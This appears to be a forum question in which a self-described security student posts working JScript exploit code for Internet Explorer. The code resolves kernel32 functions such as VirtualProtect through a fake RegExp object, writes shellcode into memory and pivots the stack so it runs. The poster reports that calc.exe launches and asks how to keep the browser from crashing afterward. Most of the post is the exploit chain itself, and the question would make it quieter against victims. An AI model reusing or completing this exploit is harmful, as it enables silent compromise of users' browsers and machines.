I am a student studying information security. Recently I read this article link and made full exploit code. calc.exe is executed as expected. But after running shellcode, IE just crashed. (because no more code provided after shellcode...). I tried to avoid crash but could not find proper solution. What I tried is as follows.
... var jscriptPointer = readDWORD(fakeRegExpAddr);
var jscriptBase = resolveModuleBase(jscriptPointer);
var kernel32Pointer = resolveModuleByIAT(jscriptBase, "KERNEL32.dll");
var kernel32Base = resolveModuleBase(kernel32Pointer);
var VirtualProtect = resolveKernel32Function(kernel32Base, "VirtualProtect");
var GetModuleHandleA = resolveKernel32Function(kernel32Base, "GetModuleHandleA");
var GetProcAddress = resolveKernel32Function(kernel32Base, "GetProcAddress");
var stack = a(fakeRegExpAddr, readDWORD(fakeRegExpAddr));
var regExpExecAddress = ((stack.charCodeAt(4)<<16)|stack.charCodeAt(3)) - 0x44;
var oldEbp = ((stack.charCodeAt(7)&0xFF)<<24) | (stack.charCodeAt(6)<<8) | ((stack.charCodeAt(5)>>8)&0xFF);
var newEbp = regExpExecAddress - 0x2000;
var pLongjmpTarget = regExpExecAddress;
var sc = fakeRegExpAddr + sizeof_RegExpObj;
for(var f=0; f<shellcode.length; f++){
a(sc + (f * sizeof_WORD), shellcode.charCodeAt(f));
}
var ctx = sc + 5;
a(ctx + (2 * e), oldEbp); // these two lines are for passing data
a(ctx + (3 * e), pLongjmpTarget); // to shellcode.
for(var f=newEbp-0x20; f<newEbp+0x40; f+=U)
{
a(f,0x7FFE0000);
}
a(newEbp + 4, VirtualProtect);
a(newEbp + 4 + 4 + 0x18, sc);
a(newEbp + 4 + 4 + 4 + 0x18, sc);
a(newEbp + 4 + 4 + 4 + 4 + 0x18, (shellcode.length * sizeof_WCHAR));
a(newEbp + 4 + 4 + 4 + 4 + 4 + 0x18, 0x40);
a(newEbp + 4 + 4 + 4 + 4 + 4 + 4 + 0x18, newEbp);
a(regExpExecAddress, newEbp);
}
This code is referenced from this link. Then I don't know what to do in shellcode. how can I handle this problem? Any suggestions are welcomed. Thanks in advance.